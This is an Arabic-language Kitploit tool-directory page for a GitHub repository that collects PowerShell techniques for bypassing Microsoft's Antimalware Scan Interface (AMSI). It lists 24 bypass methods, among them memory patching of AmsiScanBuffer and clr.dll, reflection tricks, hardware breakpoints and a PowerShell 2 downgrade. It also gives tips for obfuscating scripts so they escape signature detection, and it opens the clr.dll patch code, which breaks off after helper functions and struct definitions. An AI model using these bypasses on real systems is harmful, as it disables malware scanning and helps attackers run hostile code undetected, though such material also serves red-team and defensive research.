Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Amsi-Bypass-Powershell — يحتوي هذا المستودع على بعض طرق Amsi Bypass التي وجدتها في منشورات مدونات مختلفة. | Kitploit
أدوات/GitHubGitHub/s3cur3th1ssh1t/amsi-bypass-powershell
أدوات دفاعيةالاستغلالالتهرب من IDS/IPSالفريق الأحمرتطوير الحمولات
GitHubs3cur3th1ssh1t/amsi-bypass-powershell

Amsi-Bypass-Powershell

يحتوي هذا المستودع على بعض طرق Amsi Bypass التي وجدتها في منشورات مدونات مختلفة.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
2.2k33367منذ سنة واحدةتمت المراجعة من قبل Kitploit

برعاية

     

Amsi-Bypass-Powershell

يحتوي هذا المستودع على بعض طرق تجاوز / تفادي واجهة فحص البرامج الضارة (AMSI) التي وجدتها في منشورات مدونات مختلفة.

معظم البرامج النصية يتم اكتشافها بواسطة AMSI نفسها. لذا عليك العثور على المُحفّز وتغيير التوقيع في الجزء عن طريق إعادة تسمية المتغيرات/الدوال، استبدال السلاسل، أو التشفير وفك التشفير أثناء وقت التشغيل. بدلاً من ذلك، يمكنك إخفاؤها باستخدام ISESteroids و/أو Invoke-Obfuscation لجعلها تعمل. يمكنك أيضاً إلقاء نظرة على منشور مدونتي حول تغيير التوقيع يدوياً للحصول على تجاوز صالح مرة أخرى.

  1. تطبيق تصحيح AmsiScanBuffer في clr.dll
  2. تهريب ScriptBlock
  3. تغيير ScanContent عبر الانعكاس
  4. استخدام نقاط التوقف العتادية
  5. استخدام تعليق CLR
  6. تصحيح DLL المزود لـ Microsoft MpOav.dll
  7. اعتراض الفحص وتصحيح دالة المزود
  8. تصحيح AMSI AmsiScanBuffer بواسطة rasta-mouse
  9. تصحيح AMSI AmsiOpenSession
  10. لا تستخدم net webclient - هذه لم تعد تعمل
  11. تصحيح Amsi ScanBuffer من -> https://www.contextis.com/de/blog/amsi-bypass
  12. إجبار حدوث خطأ
  13. تعطيل تسجيل البرامج النصية
  14. تصحيح مخزن Amsi المؤقت - في الذاكرة
  15. نفس 6 ولكن بايتات صحيحة بدلاً من Base64
  16. استخدام طريقة الانعكاس لمات غريبر
  17. استخدام طريقة الانعكاس لمات غريبر مع تجاوز التسجيل الذاتي لـ WMF5
  18. استخدام طريقة الانعكاس الثانية لمات غريبر
  19. استخدام طريقة اختطاف DLL لكورنيليس دي بلاه
  20. استخدام إصدار PowerShell 2 - لا يدعم AMSI
  21. Nishang شامل
  22. تصحيح آدم تشيستر
  23. نسخة معدلة من 3. تصحيح Amsi ScanBuffer - بدون تجميع CSC.exe
  24. تصحيح عنوان AmsiScanBuffer في System.Management.Automation.dll

تصحيح Clr

  • موضح هنا تعديل CLR DLL في الذاكرة```powershell

Define Constants

$PAGE_READONLY = 0x02 $PAGE_READWRITE = 0x04 $PAGE_EXECUTE_READWRITE = 0x40 $PAGE_EXECUTE_READ = 0x20 $PAGE_GUARD = 0x100 $MEM_COMMIT = 0x1000 $MAX_PATH = 260

Helper functions

function IsReadable { param ($protect, $state) return ((($protect -band $PAGE_READONLY) -eq $PAGE_READONLY -or ($protect -band $PAGE_READWRITE) -eq $PAGE_READWRITE -or ($protect -band $PAGE_EXECUTE_READWRITE) -eq $PAGE_EXECUTE_READWRITE -or ($protect -band $PAGE_EXECUTE_READ) -eq $PAGE_EXECUTE_READ) -and ($protect -band $PAGE_GUARD) -ne $PAGE_GUARD -and ($state -band $MEM_COMMIT) -eq $MEM_COMMIT) }

function PatternMatch { param ($buffer, $pattern, $index) for ($i = 0; $i -lt $pattern.Length; $i++) { if ($buffer[$index + $i] -ne $pattern[$i]) { return $false } } return $true }

if ($PSVersionTable.PSVersion.Major -gt 2) { # Create module builder $DynAssembly = New-Object System.Reflection.AssemblyName("Win32") $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("Win32", $False)

# Define structs
$TypeBuilder = $ModuleBuilder.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("AllocationBase", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("AllocationProtect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("RegionSize", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("State", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("Protect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("Type", [Int32], [System.Reflection.FieldAttributes]::Public)
$MEMORY_INFO_BASIC_STRUCT = $TypeBuilder.CreateType()

# Define structs
$TypeBuilder = $ModuleBuilder.DefineType("Win32.SYSTEM_INFO", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("wProcessorArchitecture", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wReserved", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwPageSize", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("lpMinimumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("lpMaximumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwActiveProcessorMask", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwNumberOfProcessors", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwProcessorType", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwAllocationGranularity", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wProcessorLevel", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wProcessorRevision", [UInt16], [System.Reflection.FieldAttributes]::Public)
$SYSTEM_INFO_STRUCT = $TypeBuilder.CreateType()
تنزيل الأداة